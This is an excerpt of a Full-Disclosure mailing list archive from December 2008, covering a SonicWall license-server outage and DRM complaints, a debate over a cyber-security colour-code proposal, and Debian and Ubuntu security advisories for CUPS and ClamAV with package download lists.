Their forum (probably requires registration) is full of complaints about it. Screenshots of it and other problem areas are available on request .. but I don't want to email them to this entire list). The first alert was these warnings : ---------------------------------------------------------------- ~~ SonicWALL Email Security Alert (6.2.2.1071) ~~ ---------------------------------------------------------------- [Summary: Your Email Security licenses have been reset.] Details: Host Name: **ourmailhost** Description: The Email Security licenses have been reset at 12/02/2008 04:18 EST. The email filtering will not be working. TimeStamp: LocalTime: Tue Dec 2 04:18:49 2008 GMT: Tue Dec 2 09:18:49 2008 Additional Information: Recommended Action: Please contact SonicWall Technical Support. A response from their technical support on the issue went like this : "The issue is on our backend server who stores the registrations, some ES appliances got licences resetted. The exact cause is still being analized with high priority. In those cases entering the mysonicwall credentials or uploading file solve the issue. Kind Regards Ivan" And as of now, their license server is **still** off-line : $ telnet licensemanager.sonicwall.com 443 Trying 204.212.170.143... telnet: Unable to connect to remote host: Connection refused DRM schemes like this only cause problems for the LEGITIMATE customers . -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/15260490/attachment.html From elazar at hushmail.com Tue Dec 2 19:36:12 2008 From: elazar at hushmail.com (Elazar Broad) Date: Tue, 02 Dec 2008 14:36:12 -0500 Subject: [Full-disclosure] Sonicwall license servers down .. all customers affected Message-ID: <20081202193612.7C420118041@smtp.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I stopped using SonicWall when I learned I had to purchase a whole new device for a customer that just wanted to add a few more machines to their network, instead of bumping the license like most "normal" vendors. On Tue, 02 Dec 2008 14:14:43 -0500 IT Security wrote: >Sonicwall (makers of various security products) has had their >license >manager (server) go haywire overnight and it's "reset" (meaning >invalidated) >the licenses on all of their email security products. This means >customers >can't login to their own systems (a good case against draconian >DRM like >this). Calls to support have gone straight to voicemail all >morning, and no >ETA for resolution yet exists. > >This is affecting **all** of their customers, as far as I can tell >(and >based on what I'm told by their general support ticket-taker). > >Their forum (probably requires registration) is full of complaints >about it. >Screenshots of it and other problem areas are available on request >.. but I >don't want to email them to this entire list). > >The first alert was these warnings : > >---------------------------------------------------------------- >~~ SonicWALL Email Security Alert (6.2.2.1071) ~~ >---------------------------------------------------------------- > >[Summary: Your Email Security licenses have been reset.] > >Details: >Host Name: **ourmailhost** >Description: The Email Security licenses have been reset at >12/02/2008 04:18 EST. The email filtering will not be >working. > >TimeStamp: >LocalTime: Tue Dec 2 04:18:49 2008 >GMT: Tue Dec 2 09:18:49 2008 > >Additional Information: >Recommended Action: Please contact SonicWall Technical >Support. > >A response from their technical support on the issue went like >this : > >"The issue is on our backend server who stores the registrations, >some ES >appliances got licences resetted. The exact cause is still being >analized >with high priority. In those cases entering the mysonicwall >credentials or >uploading file solve the issue. Kind Regards Ivan" > >And as of now, their license server is **still** off-line : > >$ telnet licensemanager.sonicwall.com 443 >Trying 204.212.170.143... >telnet: Unable to connect to remote host: Connection refused > >DRM schemes like this only cause problems for the LEGITIMATE >customers . -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQECAAYFAkk1jiwACgkQi04xwClgpZidpwP9EGnoiLpcTxqCI8uZn6IPZ5xNfSXs mFJBuV7+4DimJdh1Wr6XdevITM3XTvb56SqoLuKYXJTatlt5pExV16PqpCbNFTIGJl/x TjqFF2//M1GE0+02mfSpVFBTXAsji6chEWSM7KSk+4h/BGIpppc1bLC45JEscgrEWp4N OBvxfp8= =zRVw -----END PGP SIGNATURE----- -- Paying too much for your business phone system? Click here to compare systems from top companies. http://tagline.hushmail.com/fc/PnY6qxu9tWrxyM1PdHDmXgMv34TDO7Gvn9NbAdfSuL24iBSp0vlKw/ From elazar at hushmail.com Tue Dec 2 19:29:22 2008 From: elazar at hushmail.com (Elazar Broad) Date: Tue, 02 Dec 2008 14:29:22 -0500 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security Message-ID: <20081202192922.62A6C118041@smtp.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Tue, 02 Dec 2008 11:50:46 -0500 rholgstad wrote: >Mike C wrote: >> On Mon, Dec 1, 2008 at 5:27 PM, rholgstad >wrote: >> >>> and how does making a color based on these inputs protect >people? >>> >>> >> >> Once all desktops have an icon or widget (say at the right hand >> corner) with the color, and this is consistently seen >everywhere, the >> users will start associating with their online security. they >will be >> reminded that they have to be careful with the data they share. >> >> This, if implemented correctly will be a boon to security >industry, >> where the weakest kinks currently are 'n00b' users. >> >> >you are joking right? > >So some widget is going to stop the next SMB remote or IE client >side >and protect the 'n00b' users? Please explain how this works. Also >please >explain how "they will be reminded that they have to be careful >with the >data they share. " has anything to do with protecting a users >machine >from being compromised. Thats the whole point. There is a fine line between using visual alerts to put people(Joe six pack) into a state of "awareness"(more like mild hysteria) of a threat versus knowing how to protect oneself against that threat and using that awareness indicator as the kick in the ass to get moving and shore up the defenses(hell, how many security folk do this too, then again, every time something goes bump we see red). Visual alerts are great at persuasion tools, especially when the goal is to get Joe to buy your latest all-in-one-will-make-your-coffee-and-buy-you-beer AV/Malware/Spyware/Foo(whats this doing here?)/evil monkey in the closet package. So of course, Joe will never learn how to properly defend his computer/data, and the "industry" will prosper. Now, thanks to our good friends over at the DHS, the color system has turned into a complete and utter joke(for the most part), so my friend, you see, this a complete exercise in futility(besides the fact that every friggin AV/IDS/Security/SIM company out there has red, yellow and green as their corporate "flag", if you are just joining the party, then you can completely ignore this) If you really want to change state of security for the n00bs, spread the knowledge, not the colors. My .02... elazar -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQECAAYFAkk1jJIACgkQi04xwClgpZgUfgP/V8LI3a3rHs7C4q2ysvKV4NbQ4cPU nWV6y48oJ4FESHpt+TZnOjgG1hk/co/ANgejLnYAwwJQDL/rxjvfi9NY/GPK1iNeTiXm GUWrfrAhllrd2mov4lMXf5RVGq7Qrrk1ZXvEOmhZrDMd8dCQme0ORK+3CUB3S9PUGpfH 22I5eKQ= =OTUm -----END PGP SIGNATURE----- -- Become a Graphic Designer and earn up to $150/ hour. Click here. http://tagline.hushmail.com/fc/PnY6qxunKhhCjqRvNj8oq36yZn7HJGDPFWA7dYMteZ51ZzHPUHKiM/ From nytrokiss at gmail.com Tue Dec 2 20:08:34 2008 From: nytrokiss at gmail.com (James Matthews) Date: Tue, 2 Dec 2008 22:08:34 +0200 Subject: [Full-disclosure] Sonicwall license servers down .. all customers affected In-Reply-To: <20081202193612.7C420118041@smtp.hushmail.com> References: <20081202193612.7C420118041@smtp.hushmail.com> Message-ID: <8a6b8e350812021208p7397f68ah9cb6eb8100d642fe@mail.gmail.com> I am sure Sonic wall is going to lose many customers and other companies should learn and not put DRM in their products. I hope this will teach them. On Tue, Dec 2, 2008 at 9:36 PM, Elazar Broad wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > I stopped using SonicWall when I learned I had to purchase a whole > new device for a customer that just wanted to add a few more > machines to their network, instead of bumping the license like most > "normal" vendors. > > On Tue, 02 Dec 2008 14:14:43 -0500 IT Security > wrote: > >Sonicwall (makers of various security products) has had their > >license > >manager (server) go haywire overnight and it's "reset" (meaning > >invalidated) > >the licenses on all of their email security products. This means > >customers > >can't login to their own systems (a good case against draconian > >DRM like > >this). Calls to support have gone straight to voicemail all > >morning, and no > >ETA for resolution yet exists. > > > >This is affecting **all** of their customers, as far as I can tell > >(and > >based on what I'm told by their general support ticket-taker). > > > >Their forum (probably requires registration) is full of complaints > >about it. > >Screenshots of it and other problem areas are available on request > >.. but I > >don't want to email them to this entire list). > > > >The first alert was these warnings : > > > >---------------------------------------------------------------- > >~~ SonicWALL Email Security Alert (6.2.2.1071) ~~ > >---------------------------------------------------------------- > > > >[Summary: Your Email Security licenses have been reset.] > > > >Details: > >Host Name: **ourmailhost** > >Description: The Email Security licenses have been reset at > >12/02/2008 04:18 EST. The email filtering will not be > >working. > > > >TimeStamp: > >LocalTime: Tue Dec 2 04:18:49 2008 > >GMT: Tue Dec 2 09:18:49 2008 > > > >Additional Information: > >Recommended Action: Please contact SonicWall Technical > >Support. > > > >A response from their technical support on the issue went like > >this : > > > >"The issue is on our backend server who stores the registrations, > >some ES > >appliances got licences resetted. The exact cause is still being > >analized > >with high priority. In those cases entering the mysonicwall > >credentials or > >uploading file solve the issue. Kind Regards Ivan" > > > >And as of now, their license server is **still** off-line : > > > >$ telnet licensemanager.sonicwall.com 443 > >Trying 204.212.170.143... > >telnet: Unable to connect to remote host: Connection refused > > > >DRM schemes like this only cause problems for the LEGITIMATE > >customers . > -----BEGIN PGP SIGNATURE----- > Charset: UTF8 > Version: Hush 3.0 > Note: This signature can be verified at https://www.hushtools.com/verify > > wpwEAQECAAYFAkk1jiwACgkQi04xwClgpZidpwP9EGnoiLpcTxqCI8uZn6IPZ5xNfSXs > mFJBuV7+4DimJdh1Wr6XdevITM3XTvb56SqoLuKYXJTatlt5pExV16PqpCbNFTIGJl/x > TjqFF2//M1GE0+02mfSpVFBTXAsji6chEWSM7KSk+4h/BGIpppc1bLC45JEscgrEWp4N > OBvxfp8= > =zRVw > -----END PGP SIGNATURE----- > > -- > Paying too much for your business phone system? Click here to compare > systems from top companies. > > http://tagline.hushmail.com/fc/PnY6qxu9tWrxyM1PdHDmXgMv34TDO7Gvn9NbAdfSuL24iBSp0vlKw/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://www.astorandblack.com/ http://www.jewelerslounge.com/liberty-coin-cufflinks -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/d12b7ddc/attachment.html From joey at infodrom.org Tue Dec 2 21:09:10 2008 From: joey at infodrom.org (Martin Schulze) Date: Tue, 2 Dec 2008 22:09:10 +0100 (CET) Subject: [Full-disclosure] [SECURITY] [DSA 1677-1] New CUPS packages fix arbitrary code execution Message-ID: <20081202210910.50C4D2B3E1B@finlandia.home.infodrom.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1677-1 security at debian.org http://www.debian.org/security/ Martin Schulze December 2nd, 2008 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : cupsys Vulnerability : integer overflow Problem type : local (remote) Debian-specific: no CVE ID : CVE-2008-5286 Debian Bug : 507183 An integer overflow has been discovered in the image validation code of cupsys, the Common UNIX Printing System. An attacker could trigger this bug by supplying a malicious graphic that could lead to the execution of arbitrary code. For the stable distribution (etch) this problem has been fixed in version 1.2.7-4etch6. For testing distribution (lenny) this issue will be fixed soon. For the unstable distribution (sid) this problem has been fixed in version 1.3.8-1lenny4. We recommend that you upgrade your cupsys packages. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6.dsc Size/MD5 checksum: 1092 a7198b7e0d7724a972d4027e805b1387 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6.diff.gz Size/MD5 checksum: 108940 1321ea49cfa8c06d619759acb00b0b2e http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7.orig.tar.gz Size/MD5 checksum: 4214272 c9ba33356e5bb93efbcf77b6e142e498 Architecture independent components: http://security.debian.org/pool/updates/main/c/cupsys/cupsys-common_1.2.7-4etch6_all.deb Size/MD5 checksum: 917900 4abe699f9d2a8f866b1e323934c6172a http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-gnutls10_1.2.7-4etch6_all.deb Size/MD5 checksum: 46256 9e98540d35e8a7aef76a1042cc4befe4 Alpha architecture: http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_alpha.deb Size/MD5 checksum: 1614646 18542415a7a35563aacf6baccc2c474c http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_alpha.deb Size/MD5 checksum: 39316 641f1871ea3d1e61a56dc009b2e58652 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_alpha.deb Size/MD5 checksum: 85894 99a322067e2207a67afc55dccd5d63b4 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_alpha.deb Size/MD5 checksum: 1092462 e2c0dd66dc9d52d41b7e179fa83908ab http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_alpha.deb Size/MD5 checksum: 95658 51c76b87321a3c01dfe996fabad2de88 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_alpha.deb Size/MD5 checksum: 72682 751a0c814ae40bf75b0494dafd19bd8e http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_alpha.deb Size/MD5 checksum: 175346 f8701aeb6bc3670c3f1e60cc80c4ded7 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_alpha.deb Size/MD5 checksum: 183712 42dc520b09c22f1d25b7ff1e6d7574bb AMD64 architecture: http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_amd64.deb Size/MD5 checksum: 1576182 fe94635e099af684c654fb6468522f21 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_amd64.deb Size/MD5 checksum: 36342 3e5954fdc1c572e86f2eeef93c1f466f http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_amd64.deb Size/MD5 checksum: 80704 9a21d4104655094da5f2ff3a4c019a08 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_amd64.deb Size/MD5 checksum: 1087506 cd83b8b030a4c972b1b3fa396114d9e9 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_amd64.deb Size/MD5 checksum: 86360 aeed41809da68dc26e7c586e87878c45 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_amd64.deb Size/MD5 checksum: 53008 9f8e3453367ef72e6ef6f00dc6baf624 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_amd64.deb Size/MD5 checksum: 162608 a768dc52659411be6fd46b38df61d69b http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_amd64.deb Size/MD5 checksum: 142546 a6caf31df81c4aea72c0abc9c0a0b1af ARM architecture: http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_arm.deb Size/MD5 checksum: 1569702 f7cd63fd8d10e8fcaea2649260b8437a http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_arm.deb Size/MD5 checksum: 35934 e5a3e25422b8ded68767d8c32d9291f5 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_arm.deb Size/MD5 checksum: 78916 f9707c6c35f2c3198892a8d82eecfa8b http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_arm.deb Size/MD5 checksum: 1026248 79e9a9669d9d896d303e29ed7d2b7122 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_arm.deb Size/MD5 checksum: 85540 45e25e1887e37f029a3a8da50b309fe4 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_arm.deb Size/MD5 checksum: 48732 b90d30685f1e68a036a512cf331547e6 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_arm.deb Size/MD5 checksum: 155278 1a0b8b93532c23d26866afc163689dd6 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_arm.deb Size/MD5 checksum: 132032 5c4843fe297598ee3c618f92feaef93e HP Precision architecture: http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_hppa.deb Size/MD5 checksum: 1624116 e285d90e7861906f00f8e709cb3039ae http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_hppa.deb Size/MD5 checksum: 39544 d3015a7ef0c7c345d3940a6c9f428cf0 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_hppa.deb Size/MD5 checksum: 84804 a4fa9da96d848e7596d6e3d623fdef07 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_hppa.deb Size/MD5 checksum: 1032854 ec6badd9fcff41974f425d97a0a12165 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_hppa.deb Size/MD5 checksum: 92038 3dcbb10b949495e21fc742b9b42a3a84 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_hppa.deb Size/MD5 checksum: 57376 e64d3d7a95c80c92602e3e7548998bc2 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_hppa.deb Size/MD5 checksum: 171856 ab864167ddd2c8b4247898ed36059435 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_hppa.deb Size/MD5 checksum: 153942 4149487b7dfd72b027de9851a4adb32e Intel IA-32 architecture: http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_i386.deb Size/MD5 checksum: 1556170 c0cefa71d7f58abd666c2c1459d3ede9 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_i386.deb Size/MD5 checksum: 36250 e464d81d46968426796a8182e6418691 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_i386.deb Size/MD5 checksum: 79702 77c4aef7c78be537c09bc689ad1f5139 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_i386.deb Size/MD5 checksum: 997624 ec73926b9d49c2790c6381a927ad20a2 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_i386.deb Size/MD5 checksum: 87310 86517be38ba93afd954091ad5643c65b http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_i386.deb Size/MD5 checksum: 53240 4fccf1dfd78b230033407a914760d3f5 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_i386.deb Size/MD5 checksum: 161274 41344ee4c268c095b89c8decc0e2df68 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_i386.deb Size/MD5 checksum: 137796 51b8758e0338e1ec6ec9d74ea5f960ef Intel IA-64 architecture: http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_ia64.deb Size/MD5 checksum: 1771030 d4235a8ee49af176f27c8a097a696864 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_ia64.deb Size/MD5 checksum: 46326 729ebfb9347d0463f7a6f5cc10c371e7 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_ia64.deb Size/MD5 checksum: 106218 9a9142746bbca2c53644c084b45fea9c http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_ia64.deb Size/MD5 checksum: 1108324 ea4f9d4d44e6b964c3793fd3a2862671 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_ia64.deb Size/MD5 checksum: 107068 bab641470a0bf7034b9ebc7ae072d6fa http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_ia64.deb Size/MD5 checksum: 74214 770441377ccf9ad422da6e9d3ba612eb http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_ia64.deb Size/MD5 checksum: 204316 7df30a0f5661ea79cdcc537d4012b217 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_ia64.deb Size/MD5 checksum: 192364 41d3bab218b036299f8ffae98a9008de Big endian MIPS architecture: http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_mips.deb Size/MD5 checksum: 1567974 ba75b6ff260e84dd64b939cae9262a54 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_mips.deb Size/MD5 checksum: 36112 6cae983101bdd812ff1f6f26169ab06a http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_mips.deb Size/MD5 checksum: 76146 16b61a899c465fc7f142d97744dffba3 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_mips.deb Size/MD5 checksum: 1098272 daa46352b0ad47b5c3061c42a15e6ddb http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_mips.deb Size/MD5 checksum: 86920 dd75cd6ce9bd9ceaae7d39b60fda49c9 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_mips.deb Size/MD5 checksum: 57690 32cfeb2301ded386cf4ab6d0127f30a3 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_mips.deb Size/MD5 checksum: 158092 9abd9b0ce1dc1528b0ca50b5fbb7b78b http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_mips.deb Size/MD5 checksum: 150986 149531690113d5333beaf1622f915037 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_mipsel.deb Size/MD5 checksum: 1553596 a42820cf5bd8d46c4a5cab2a6bd0929a http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_mipsel.deb Size/MD5 checksum: 36076 f7239a53b24df0813b16aac1efc850b7 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_mipsel.deb Size/MD5 checksum: 77462 a60a8f2d6ab7958026585952890fc751 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_mipsel.deb Size/MD5 checksum: 1085502 a18f21c9c0eff69d326bf42596d3ed32 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_mipsel.deb Size/MD5 checksum: 87080 1b5618e9841ec899e63ee14cb36116d1 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_mipsel.deb Size/MD5 checksum: 57848 def6826bc2876abfcf1b9ad01eea3546 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_mipsel.deb Size/MD5 checksum: 158634 bc4151665423bb6acc3225d1f8017b50 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_mipsel.deb Size/MD5 checksum: 150888 f27527d8e7d3b892f5e2dc7aa0776434 PowerPC architecture: http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_powerpc.deb Size/MD5 checksum: 1576684 9c91771aea9ad144c56967ac8caf1fd5 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_powerpc.deb Size/MD5 checksum: 41290 69d7ba1506a7415dc74621aa833edf59 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_powerpc.deb Size/MD5 checksum: 89994 12245002a3f5e437921979cd8362d346 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_powerpc.deb Size/MD5 checksum: 1143404 c79dd5b219961ded9d9dfebf2361fed0 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_powerpc.deb Size/MD5 checksum: 88542 988f4b258fbdf870d51aacd1dd26b116 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_powerpc.deb Size/MD5 checksum: 51880 650b5a80af7485308b6fca8a0453c9c0 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_powerpc.deb Size/MD5 checksum: 163284 4fc43ad526d97ad3823524988c892851 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_powerpc.deb Size/MD5 checksum: 136868 2e1cdfaf184170342520895e26ee84b1 IBM S/390 architecture: http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_s390.deb Size/MD5 checksum: 1587456 5522fd1afaaa1105a51c91354783fd6f http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_s390.deb Size/MD5 checksum: 37422 38b8fd3823381f4384f8758139f3d418 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_s390.deb Size/MD5 checksum: 82336 55c8f39b3d04e0a127426f2daf89941f http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_s390.deb Size/MD5 checksum: 1037274 02149d41988647e7f4de8e626801c588 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_s390.deb Size/MD5 checksum: 88040 8c844af7aeb9c0e1ec9a093a537d5f91 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_s390.deb Size/MD5 checksum: 52508 c3695c0157c8bba7eb2bc614173bcd0f http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_s390.deb Size/MD5 checksum: 166802 1893c39f92d371c7b474d57f4d8c105e http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_s390.deb Size/MD5 checksum: 144928 0eb6cdbc1deceb32bbf2c145a99f7d98 Sun Sparc architecture: http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch6_sparc.deb Size/MD5 checksum: 1562538 0757006ce0c52845673d2cbe9fae0b38 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch6_sparc.deb Size/MD5 checksum: 36020 27636d7df41cfef4c9e41ee236a9b308 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch6_sparc.deb Size/MD5 checksum: 78518 174e3b09d2d667e01d0b47ecb06a2925 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch6_sparc.deb Size/MD5 checksum: 992164 79a9729f9280b70aa7e8573636cfeb8c http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch6_sparc.deb Size/MD5 checksum: 85368 4c3b851a551b47fed4229f55b8a0a4fe http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch6_sparc.deb Size/MD5 checksum: 51756 d4406a58edf127974a79b0df75eab757 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch6_sparc.deb Size/MD5 checksum: 159176 29057219279ea090cf47b35b1da416af http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch6_sparc.deb Size/MD5 checksum: 139560 ca580a13d486d24f74c9a230efee6bde These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJNaPhW5ql+IAeqTIRAiX7AJwJd3Szo5tvpYyBrqggsDuPSulvKACfVJsa EwALyW+6s+Lgp2d1GI2ong4= =R0SH -----END PGP SIGNATURE----- From kees at ubuntu.com Tue Dec 2 22:20:25 2008 From: kees at ubuntu.com (Kees Cook) Date: Tue, 2 Dec 2008 14:20:25 -0800 Subject: [Full-disclosure] [USN-684-1] ClamAV vulnerability Message-ID: <20081202222025.GH25309@outflux.net> =========================================================== Ubuntu Security Notice USN-684-1 December 02, 2008 clamav vulnerability https://bugs.launchpad.net/bugs/304017 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.10: libclamav5 0.94.dfsg.2-1ubuntu0.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Ilja van Sprundel discovered that ClamAV did not handle recursive JPEG information. If a remote attacker sent a specially crafted JPEG file, ClamAV would crash, leading to a denial of service. Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0.1.diff.gz Size/MD5: 159258 35b619fff489b7fdbfacd86170572cfa http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0.1.dsc Size/MD5: 1545 d35181ceb4a8b93aa8ef3d80f424a52e http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.94.dfsg.2.orig.tar.gz Size/MD5: 22073819 7b45b0c54b887b23cb49e4bff807cf58 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-base_0.94.dfsg.2-1ubuntu0.1_all.deb Size/MD5: 19497162 d2d7052e4859a66f9556a33839be072b http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-docs_0.94.dfsg.2-1ubuntu0.1_all.deb Size/MD5: 1077346 0c0e57cf0a6d5004611621c81d158b3e 